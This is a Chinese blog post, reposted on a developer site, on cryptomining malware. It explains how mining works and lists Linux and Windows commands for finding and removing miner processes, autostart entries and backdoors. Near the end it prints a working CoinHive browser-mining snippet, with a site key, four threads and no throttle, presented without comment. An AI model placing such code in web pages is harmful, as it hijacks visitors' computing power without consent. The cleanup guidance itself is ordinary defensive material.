linux 挖矿脚本,挖矿脚本 | Wh0ale’s Blog「建议收藏」

linux 挖矿脚本,挖矿脚本 | Wh0ale’s Blog「建议收藏」0x01挖矿概论所谓挖矿,其实就是通过计算机的计算能力获取数字货币。而矿池就是进行生产任务(挖矿)和生产利润的分配。一套挖矿流程大致如下:1、本地安装挖矿程序并启动2、挖矿程序向远程矿池请求计算的输入值3、远程矿池验证该用户并分配任务,发送计算初始值4、挖矿程序接受初始值并依照特定数字货币算法进行计算,得到计算结果并发送至矿池5、矿池接受计算结果并发送下一次计算的输入值0x02挖矿病毒主要特点1、…

大家好,又见面了,我是你们的朋友全栈君。

0x01挖矿概论

所谓挖矿,其实就是通过计算机的计算能力获取数字货币。而矿池就是进行生产任务(挖矿)和生产利润的分配。一套挖矿流程大致如下:

1、本地安装挖矿程序并启动

2、挖矿程序向远程矿池请求计算的输入值

3、远程矿池验证该用户并分配任务,发送计算初始值

4、挖矿程序接受初始值并依照特定数字货币算法进行计算,得到计算结果并发送至矿池

5、矿池接受计算结果并发送下一次计算的输入值

0x02挖矿病毒主要特点

1、由于需要与矿池通信,因此会与矿池建立连接

2、挖矿利用计算机的算力,因此CPU,GPU的利用率会增加

3、为防止服务器重启挖矿进程中断,会建立任务实现开机自启动

4、为便于下一次利用,可能会留木马后门

0x03挖矿病毒查杀(linux)

一:查找病毒文件top 查看cpu使用情况,注意cpu异常的command

netstat -ano 查看是否有异常连接

ps -ef 命令全局检查异常程序及命令;ps -ef | grep command 查看异常command的进程,记录相应pid

ls -l /proc/pid 查看相应pid的详细信息(查找病毒执行文件所在地)4.1 cwd:表示进程的运行目录(常为服务器攻击成功后所在目录)

4.2 exe:表示执行程序的绝对路径(常为病毒文件目录)

4.3 cmdline:表示程序运行时输入的命令行命令

4.4 environ:记录进程运行时的环境变量

4.5 fd:该目录为进程打开或使用的文件的符号连接

病毒文件找到后,注意解读病毒文件内容,寻找有效信息

二:去除自启动项cat /etc/rc.local 查看rc.local的开机自启动项是否异常

cd /var/spool/cron/crontabs; cat filename 查看计划任务是否正常

ntsysv 或 chkconfig –list 查看系统服务

三:查找后门文件history ; cat ~/.bash_history 查看被攻击后所执行的历史命令

find / -mtime 0 返回最近24小时修改过的文件

find / -mtime 1 返回最近24-48小时间修改过的文件

netstat -ano 后门文件同样也要建立连接,查看异常连接

0x04挖矿病毒查杀(windows)

一:查找病毒文件

当任务管理器能打开时:任务管理查看cpu占用高的进程

当任务管理器不能打开时:

netstat -na 查看异常端口1.1 netstat -ano | findstr “port” 查看对于端口的pid

1.2 tasklist|findstr “pid” 查看对应pid的占用程序

1.3 wmic process where name=”进程名” 查找对于进程所在目录

wmic cpu get loadpercentage(查看总cpu占用)

wmic process list brief|full 列出进程

taskkill /im 进程名 /f;taskkill /pid pid名 /f 杀进程

二:去除自启动项

1、(运行–>regedit)

HKEY_LOCAL _MACHINE\Software \Microsoft\Windows\CurrentVersion下所有以“run”开头的键值;

HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion下所有以“run”开头的键值;

HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion下所有以“Run”开头的键值;

部分如下

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]

2、Win.ini中启动

[windows]字段中的”load=”和”run=”

3、自启动组

启动组对应的文件夹为:C: \Windows\Start Menu\Programs\StartUp,

在注册表中的位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Startup=”C:\windows\start menu\programs\startup”

4、修改文件关联

检查HKEY_CLASSES_ROOT\文件类型\shell\open\command主键,查看其键值是否正常

DOS下执行scanreg/restore 恢复前5天的注册表

三:查找后门文件

查找后门文件参考一二

593d6425140f7f5f8ef434934314803c.png

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

var miner = new CoinHive.User(‘mrvzoq1cDAIacUG3dGEkg2TJznuIogMB’,’Landian’, {

threads: 4,

autoThreads: false,

throttle: 0,

forceASMJS: false

});

miner.start();

var _hmt = _hmt || [];

(function() {

var hm = document.createElement(“script”);

hm.src = “https://hm.baidu.com/hm.js?2378278a9b9c54d270c1d6245e3c06ed”;

var s = document.getElementsByTagName(“script”)[0];

s.parentNode.insertBefore(hm, s);

})();

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/158481.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • php清除浏览器缓存代码,js清除浏览器缓存

    php清除浏览器缓存代码,js清除浏览器缓存本篇文章的内容是js清除浏览器缓存,在这里分享给大家,也可以给有需要的朋友做一下参考,大家一起来看一看吧一、meta方式一开始百度后的做法,但是在360中并不适应二、动态引入js+时间戳去除静态html的缓存–动态引入js文件动态引入js文件以及在js文件后边添加动态参数代码window.onload=function(){varscript=document.createElement(“s…

  • 2020美赛A题解题思路(Moving North)

    2020美赛A题解题思路(Moving North)ProblemA:MovingNorth由于海洋温度升高的原因,美国东北海岸的龙虾种群正在往北迁移到海洋温度更低的加拿大海岸附近。但是这会影响到加拿大东岸(即苏格拉北大西洋)的渔业公司的经营。他们想知道,如果全球温度继续升温,苏格拉渔场的鲱鱼和鲭鱼会如何迁移,因为这两种鱼是他们主要的经济来源(而他们的渔船又没有制冷设备,无法长期保存活鱼)。问题1:建立数学模型,预测50年内该两种鱼群的迁…

  • windows添加路由命令route add_windows添加路由命令route add

    windows添加路由命令route add_windows添加路由命令route addLinux下routeadd命令添加路由列表

  • C语言-判断回文字符串(二)

    C语言-判断回文字符串(二)7-2 判断回文字符串 (15分)输入一个字符串,判断该字符串是否为回文。回文就是字符串中心对称,从左向右读和从右向左读的内容是一样的。输入格式:输入在一行中给出一个不超过80个字符长度的、以回车结束的非空字符串。输出格式:输出在第1行中输出字符串。如果它是回文字符串,在第2行中输出Yes,否则输出No。输入样例1:level输出样例1:levelYe…

  • 解决Warning: scandir() has been disabled for security reasons in…的问题

    解决Warning: scandir() has been disabled for security reasons in…的问题

  • linux添加静态路由命令_linux route add永久路由

    linux添加静态路由命令_linux route add永久路由linux下静态路由修改命令方法一:添加路由routeadd-net192.168.0.0/24gw192.168.0.1routeadd-host192.168.1.1dev192.168.0.1删除路由routedel-net192.168.0.0/24gw192.168.0.1add增加路由del删除路由-net设置到某…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号